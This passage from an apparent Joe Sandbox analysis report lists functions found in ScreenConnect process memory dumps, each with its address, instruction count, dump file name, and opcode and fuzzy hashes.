Function 00CC5DE0 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

nCvq, xrefs: 00CC5ED1

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq
API String ID: 0-3590779759
Opcode ID: cf19432f6d2b89ffb7d648a18e076fb5835f59c517b815422cd26c83954fb242
Instruction ID: d02a138a1fcab0e9496a974f6abe53daba0d64df22a6e384487c3d62e691cc6d
Opcode Fuzzy Hash: cf19432f6d2b89ffb7d648a18e076fb5835f59c517b815422cd26c83954fb242
Instruction Fuzzy Hash: 04517170700A058FDB18DB79C554B6E7BE6AF88300B2484BCE416DB365EF74ED468B91

Function 00CC5DC0 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

nCvq, xrefs: 00CC5ED1

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: nCvq
API String ID: 0-3590779759
Opcode ID: f73d15bb370a5fb42e9fcc391ba87c625f882164587fb2b271feb4fa7fe86373
Instruction ID: d2b7a4350b09fd89d64746785db3c224b5427e44feda14b4979cfaed057af5e7
Opcode Fuzzy Hash: f73d15bb370a5fb42e9fcc391ba87c625f882164587fb2b271feb4fa7fe86373
Instruction Fuzzy Hash: 2F418070700A058FDB18DB78C554B6E77E2AF88300B2484ACD416CB365EF74ED86CB90

Function 00CC6FE8 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

(, xrefs: 00CC70FE

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: d91151ab0534bd064a1205cc225b26aa1b2c3d55585bfd0ec9ac0b3a9a7f642d
Instruction ID: e0a13a222d32089ec40b118462dfe541d75fc0059fecad7ebb32ca6b115172ae
Opcode Fuzzy Hash: d91151ab0534bd064a1205cc225b26aa1b2c3d55585bfd0ec9ac0b3a9a7f642d
Instruction Fuzzy Hash: 4B31E371B00A019F9B1AEBBCD950A6E7BE2EBC531031086A9D415DB345EF74AE09CBD1

Function 00CC6FF8 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

(, xrefs: 00CC70FE

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-1334834377
Opcode ID: dc3b145fce670a72e07ed1ac9715f3e049f364438e60aef9074b10b45af08026
Instruction ID: 064d5148ab1cf694577ab87ba84f09899ea7a6a492b412cb74c0fece9ff4a508
Opcode Fuzzy Hash: dc3b145fce670a72e07ed1ac9715f3e049f364438e60aef9074b10b45af08026
Instruction Fuzzy Hash: D331E171B00A059F9B19EBBDD940A5EB7E6EBC83103108678D51ADB344EF74EE098BD0

Function 00CCE4F9 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

LR^q, xrefs: 00CCE534

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 9c7efcf48c30ebc1ed4354155b7335b5947d0d8f74d46ae1b69b7ce9d80979cb
Instruction ID: 8b1d237903776037caedccea532642a621ebd8edee5aa8d408bb040eba26a1f8
Opcode Fuzzy Hash: 9c7efcf48c30ebc1ed4354155b7335b5947d0d8f74d46ae1b69b7ce9d80979cb
Instruction Fuzzy Hash: F521B531B001049FDB18CBA5C859FAF7B76ABC9704F18452CE402A7290EEB49C41CB50

Function 00CC5400 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

$^q, xrefs: 00CC5425

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: e2843eb89e06015b00a732e546a6b0dd4059085400838765b80f2d8ef2bc7857
Instruction ID: f3c52834df0322bb08138d73e68b78f8c065a014624e427a1cd1fefede8af63c
Opcode Fuzzy Hash: e2843eb89e06015b00a732e546a6b0dd4059085400838765b80f2d8ef2bc7857
Instruction Fuzzy Hash: D6E01770688A048FD729CF68D955F5237B8BF14712B2948FED818CB232D722E992CB41

Function 05631E14 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3562451330.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5630000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b12bf982c06bba0fb3064d38f0864fe1b874f111274703ea74ca4caae6fe1fb
Instruction ID: d5c2bf575790507950b792fe86d841537ae1f223d0498123355139472983799c
Opcode Fuzzy Hash: 3b12bf982c06bba0fb3064d38f0864fe1b874f111274703ea74ca4caae6fe1fb
Instruction Fuzzy Hash: F041907950A245EFCB02CFA8D9A5E997FF2FF4A300F168596E4418B272C734D846CB51

Function 00CCD069 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8530704193cf2b2128199067510783ad36002c5426724b12c555d81267584b08
Instruction ID: 1623c54964640617c1184ea5087b96968b861d583a43fc025404ae523a8cc879
Opcode Fuzzy Hash: 8530704193cf2b2128199067510783ad36002c5426724b12c555d81267584b08
Instruction Fuzzy Hash: 0DA10874B402098FCB14DBA9C994EADBBF2EF89300F154169E406AB365DB75ED41CF80

Function 00CCE308 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f955d08e559a8357285ea2c1ee36f5e0743501a8bf866403e0a65436a5cf1d
Instruction ID: 8b4e028cc0cee7ee6c2b90531ab4fc4462921897eb733e57c75dbe797fa58f72
Opcode Fuzzy Hash: 41f955d08e559a8357285ea2c1ee36f5e0743501a8bf866403e0a65436a5cf1d
Instruction Fuzzy Hash: B6517B347002068FCB14DFA8C994E6AB7E6EFD9300B15856DE55ACB365EB74EC068B90

Function 00CCE318 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9fea4ff33ea3ecd3f8103fbcf6441354be2c04229efdf4c420f4c5652fd2206
Instruction ID: 9e217eefce534e60b8803216649a404026240093ae6a721641bf04b046b3b1d9
Opcode Fuzzy Hash: f9fea4ff33ea3ecd3f8103fbcf6441354be2c04229efdf4c420f4c5652fd2206
Instruction Fuzzy Hash: 27515B347002068FCB14DFA9C994E2AB7E6EFD9310B14856DE55ACB365EB74EC068B90

Function 00CC84A0 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4fe07f42cc852849b60d563f1c470522931ccae063d32dcd02fc30cd95f5f2
Instruction ID: 69e74959721653f965020e9592e9c9b59c393b4ef3d36170bda908555d410829
Opcode Fuzzy Hash: db4fe07f42cc852849b60d563f1c470522931ccae063d32dcd02fc30cd95f5f2
Instruction Fuzzy Hash: 51511930600601CFDB24CF69D894A67B7F2FF89321B244A5DE4969B7A4DB71F946CB40

Function 00CCB2D0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c589cf1ca18c9d7475b5e14b6a58aa86ede815e177b0fcbce8a7cb12f3fd028e
Instruction ID: cb31166501a5fa77300250e641582dd0837b42dea3479196c6e5dd9e25440473
Opcode Fuzzy Hash: c589cf1ca18c9d7475b5e14b6a58aa86ede815e177b0fcbce8a7cb12f3fd028e
Instruction Fuzzy Hash: E9516E70E403099FDB05EFB8E944B9DBBB6FF88300F208559E404BB265DB75A995CB50

Function 00CCB2C0 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61c27eb290ac73d19580e5a0507ed1023759b731f8f22fd62a75b0e6a5ee13b7
Instruction ID: b5c5081f6e6ffd05815af2bda6cb80ba94580e3f31662c0128f0e8a54fed86a6
Opcode Fuzzy Hash: 61c27eb290ac73d19580e5a0507ed1023759b731f8f22fd62a75b0e6a5ee13b7
Instruction Fuzzy Hash: 6D514E70E403099FDB05EFA8E984BDDBBB5FF88300F108559E404BB265DB75A996CB50

Function 00CCEF67 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68383754f14e8482ad37dab9050cec8f465df87004387e96a5d9bb2c6aadad27
Instruction ID: d16cbc44ba6bec3d1c0a15bf8ac0d330e91b54465ad0380f12daf39df4479547
Opcode Fuzzy Hash: 68383754f14e8482ad37dab9050cec8f465df87004387e96a5d9bb2c6aadad27
Instruction Fuzzy Hash: 46414171E002199BDB14DFA5C990BDEBBB6EF88704F24812DE415B7380DB70AE46CB91

Function 00CCE07F Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2c5c2c47e34f15bb5ca3fe875a18d5199a2447473a0370dc7b7c16487a57fd
Instruction ID: 3249eddb2f90817725d80ad0cdc86351d89df44538aef90c62af7fe6531462da
Opcode Fuzzy Hash: ee2c5c2c47e34f15bb5ca3fe875a18d5199a2447473a0370dc7b7c16487a57fd
Instruction Fuzzy Hash: 56316B70B402058FCB10DA69C955FAEBBF6EF8A344F18446DE406EB391DBB19D018B91

Function 00CC9978 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 885d917d0a4bd15934e1abd8fdead0c2cab24c21e0b90082c1e47204b13f6b51
Instruction ID: 941e24d408494e7dbdbfe2e7341fb64f17643dc20ac595e681b9e5c383d81374
Opcode Fuzzy Hash: 885d917d0a4bd15934e1abd8fdead0c2cab24c21e0b90082c1e47204b13f6b51
Instruction Fuzzy Hash: D9416A307102048FCB18DB79D858AAEBBF2EF88710B11456CE416D73A0DF70AD45DB90

Function 00CC9974 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00514bcdbf4d96f769d27312a25a8d8cf1c049eacaf7900d48f170acc4114e8f
Instruction ID: 2bf0ccbf35718ac9d60054be3a745560ff754c6235425b1121b876e40e96051d
Opcode Fuzzy Hash: 00514bcdbf4d96f769d27312a25a8d8cf1c049eacaf7900d48f170acc4114e8f
Instruction Fuzzy Hash: 48415931B102048FCB14DB79D858AAEBBF2EF88710B1545ACE416EB3A0DF709D45DB90

Function 00CC7920 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ec257f00375eccaba7914cf33657eb2dcb0eafd87b6b34cb16aa89e1d1a9c4
Instruction ID: 4951d07372db43056e649eefd9a450821aadd63cb4a1abed5cb2b465f1300e1a
Opcode Fuzzy Hash: d9ec257f00375eccaba7914cf33657eb2dcb0eafd87b6b34cb16aa89e1d1a9c4
Instruction Fuzzy Hash: 3231BC31B042068BDB14CFA9C494AAEF7F6EF89350F04946AE516E73A4DB30DE048B90

Function 00CC8C20 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65879631724a501233459b4d86cec35a51d573b1e8761ac3311c98e53051707c
Instruction ID: 9f4d53c3e50fe3a4a66c74153bb52135e639591759bd53a50f0cb174528f4c6b
Opcode Fuzzy Hash: 65879631724a501233459b4d86cec35a51d573b1e8761ac3311c98e53051707c
Instruction Fuzzy Hash: F831E5316002099FDF10EBB8D950AADBBB2EFC5310F048569E505EB369DF70AD0ACB91

Function 00CCDC08 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6412e38e6c8715f74c18a0019e39502a717574e12ec780b13a66c28158f885
Instruction ID: 452b98e065c81e3e468503cf28e1b41c55ea11e7464eab587bd7982fb3ecdf6e
Opcode Fuzzy Hash: 5d6412e38e6c8715f74c18a0019e39502a717574e12ec780b13a66c28158f885
Instruction Fuzzy Hash: 6831D970A007058FC730DF69D844A6AB7F1EF89314B144A6CD4A79B7A5D770EA46CF90

Function 00CC37C3 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 634411247ae7df2b0bde2deac527b12a8793bbff136aed1e8933dc3ac2ecfbd6
Instruction ID: 85be8b81ef73193260a5d5ac94b523f76be25c9f3c6e044a1fda984985c4a9fb
Opcode Fuzzy Hash: 634411247ae7df2b0bde2deac527b12a8793bbff136aed1e8933dc3ac2ecfbd6
Instruction Fuzzy Hash: F931C3727452818FC712DB78EC55A997FB5EE8621071481EAD514CF363DA30AD0ACB92

Function 00CC52F8 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aa8550147a23d93e6969ccca534529c33e885e20e46beb4f609a86620daf787
Instruction ID: 55a0c9b504a17bde4ab96ba17de39b04f667eb234c141159064a572594c2146b
Opcode Fuzzy Hash: 3aa8550147a23d93e6969ccca534529c33e885e20e46beb4f609a86620daf787
Instruction Fuzzy Hash: CE3178B1D003499FCB14DFA9C444A9EBBF4EF88320F14846AD419A7251DB78A9458BA5

Function 00CC36B0 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b2a84058561161d7b3d6267f920667ca6032eab37adc003644e3b4d0beee247
Instruction ID: e99f7640d50bbed9131c5335368635d77327739867d62e3ba3fcf90a18bef4ce
Opcode Fuzzy Hash: 9b2a84058561161d7b3d6267f920667ca6032eab37adc003644e3b4d0beee247
Instruction Fuzzy Hash: 613121B0A00345DFCB00EFB4EA4859EBBB5FF49311B1081A9D819DB355EB309E01CB62

Function 00CC6568 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64db13ebf2729053513279a49e06a1a96874fccc001b8cfd6648a5179c81b547
Instruction ID: 7e949336255f69c90ed4960dd56b5c90b0ee35039de9a7c896d8d7a32fabeb12
Opcode Fuzzy Hash: 64db13ebf2729053513279a49e06a1a96874fccc001b8cfd6648a5179c81b547
Instruction Fuzzy Hash: 2F3109306007018FCB30DF6AC944A6AB7F1EF89324B144A2DE466DB7A4D770E946CF80

Function 00CCDC18 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9a73deff920609cd19697787049855f7c37587f0bf78940df177c3f65ac98ea
Instruction ID: 7cf929979e72d2a6a999acf1dee67984054c3fb8a8a145c1767e54ac9cc84993
Opcode Fuzzy Hash: c9a73deff920609cd19697787049855f7c37587f0bf78940df177c3f65ac98ea
Instruction Fuzzy Hash: 4F31DA706007058FC730DF2AD844A66BBF1EF49310B104A6DD4A79B6A5D770EA46CF94

Function 00CCDF80 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb6eba5864399e3664d9a5130da76024de1cbc6e17c333b6008e16386f1b616
Instruction ID: 241abcf0225b3e1360990fafbc194c3239efa59947446a8b9f452db20c55933f
Opcode Fuzzy Hash: aeb6eba5864399e3664d9a5130da76024de1cbc6e17c333b6008e16386f1b616
Instruction Fuzzy Hash: C331BD707893449FC711DBACDDA0E9EBBF5EF8234431941AED049CB3A2DA70AD058B91

Function 00CC8B30 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63be205956f05c84edc32054bcb0bf123de50787acc213d79f8f04e7b0c733ee
Instruction ID: 396b1c65319b6f67333e519b533105ad3798e4fc2850d9ad08977099555807b1
Opcode Fuzzy Hash: 63be205956f05c84edc32054bcb0bf123de50787acc213d79f8f04e7b0c733ee
Instruction Fuzzy Hash: 53316F3690051ADFCF01DFA8D9409DDBBF6FF89314B1485A6E505BB264D731AA0ACB90

Function 00CC90A8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8995e24397b022037972925c9fe80216fbbce5715e2c7e9a85ae7a06869311e
Instruction ID: 5e9d967bf3d48c6ee03eb98be321d07b5c1d063be3a171f5d319b66ec82f100c
Opcode Fuzzy Hash: a8995e24397b022037972925c9fe80216fbbce5715e2c7e9a85ae7a06869311e
Instruction Fuzzy Hash: 72312C706007068FC720CF69D888A6AB7F1EF89711B144A1DD496DB7A4D731E945CB91

Function 00CCDDC0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c38337ef4fa4434df7e1657cbe337cfb1e42ccff03618842cc8fa60f2ee28027
Instruction ID: afd9d4ce5869ed6dc46e3701be4e3dd8926c60144fb3f735b8dbd90d4f060e92
Opcode Fuzzy Hash: c38337ef4fa4434df7e1657cbe337cfb1e42ccff03618842cc8fa60f2ee28027
Instruction Fuzzy Hash: E631E6706007058FC730DF6AC844A6AB7F1EF99320B148A2DD4A6DB7A5DB30E946CF90

Function 00CC36A0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9f18097dadd7e8ce975c4335dc440021e1cb0ace3c59d9cbf69f671f415759
Instruction ID: 7ada27e12820bb4df01593dc8a0228f8d5730e8b4225bbb06167a832764042de
Opcode Fuzzy Hash: bc9f18097dadd7e8ce975c4335dc440021e1cb0ace3c59d9cbf69f671f415759
Instruction Fuzzy Hash: BB2103B1A00251DFCB14EFB8EA48AAEBBB1FB48311B148169D816D7354EB31DE05CB51

Function 00CCDFA8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50477df35ed12a9386bde7b0a944c5467d71b88f3f19ebde07e296059817620c
Instruction ID: 25f7924ead65861720a8f9358fed011d32b9bacb83dd56c1f556c2aaf5c50a43
Opcode Fuzzy Hash: 50477df35ed12a9386bde7b0a944c5467d71b88f3f19ebde07e296059817620c
Instruction Fuzzy Hash: 1E11D3B13402004BD710D6AEF984A6AB7D9EBC03A8B10447AE61DCB354EE61EC1187A0

Function 00A4D688 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547240835.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a4d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61712a446577544f390e1f6e4a120a01dc27b38000f74e68de55d13f45f3894
Instruction ID: b3dd5485c631e8b99db59d3817fd6a4a10862f63db1eaf4f5363e59699e2fc62
Opcode Fuzzy Hash: d61712a446577544f390e1f6e4a120a01dc27b38000f74e68de55d13f45f3894
Instruction Fuzzy Hash: 5D213779500200DFCB05DF14D9C4B2ABF65FBD8314F20C66DE9094B256C336D856DBA1

Function 00CCE198 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc183092e257d292f34d2a806cd8eb48b46536e2953a8cecb1ec33044d469edc
Instruction ID: 819f771be3c02394039099b0a17f6c46ae3e46b6ce6303e9d8dd6ce9747cc387
Opcode Fuzzy Hash: fc183092e257d292f34d2a806cd8eb48b46536e2953a8cecb1ec33044d469edc
Instruction Fuzzy Hash: 1A219F31B002099FCB11DBA8DC81AAEBBF5EFC9314B008629E415DB355DB30ED058BC0

Function 00CCED68 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8a1dd542e09820d512e9efb86b9610275106c1b073d1b6b9c15cd89442be7f
Instruction ID: fac66358fdbaa8b3ba07c6ea612efa71988f21085696dee581dcbbbac9fc8e73
Opcode Fuzzy Hash: 4e8a1dd542e09820d512e9efb86b9610275106c1b073d1b6b9c15cd89442be7f
Instruction Fuzzy Hash: C5213D32D1470A9DCB11EFB9D8505EEFBB0EF9A300B11C62AD559A7111FB70A2A5CB81

Function 00CCF878 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd59e6b58a3d2fd7e18f77625c0bc6be6e217ff8a3bf2c8617ce69131473876a
Instruction ID: 69386518c84f63ac2d6cba363c5b2bbcc1824f1901423a5e0750edaf37f095c6
Opcode Fuzzy Hash: bd59e6b58a3d2fd7e18f77625c0bc6be6e217ff8a3bf2c8617ce69131473876a
Instruction Fuzzy Hash: 422136B690025ADFCF10CF99C844ADEBBF2FF88310F148529E969A7251C335A556CFA1

Function 00CC86D0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a2a6a294ef732ae200635a3fcc12fc6cec3f7b43e6de433595452949599c421
Instruction ID: 76d76519b88b5ca9b613c3851af3eaa1ec06d2c2f69ac6e363809b9255070d05
Opcode Fuzzy Hash: 1a2a6a294ef732ae200635a3fcc12fc6cec3f7b43e6de433595452949599c421
Instruction Fuzzy Hash: 4A2101345006058FC734CF66D844A97B7F1EF44310B208A2DD4A3976A1EB71E98ACF90

Function 00CCA7B0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3547791194.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9eb308d9357aa86d8fbb8856dc93c6d2ad3c232bd7f187aa9d1cd6381c0bdb3
